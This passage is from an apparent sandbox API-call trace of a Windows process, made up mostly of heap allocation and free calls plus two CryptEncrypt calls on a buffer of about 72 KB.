hHeap=0x970000) returned 1 [0268.473] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x119ea, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x119f0) returned 1 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0268.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0268.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0268.477] CharLowerBuffW (in: lpsz="byte[72176]", cchLength=0xb | out: lpsz="byte[72176]") returned 0xb [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.481] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51dd8 [0268.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51dd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.483] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0x119ea, dwBufLen=0x119f0 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0x119f0) returned 1 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0268.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0268.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0268.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0268.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0268.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 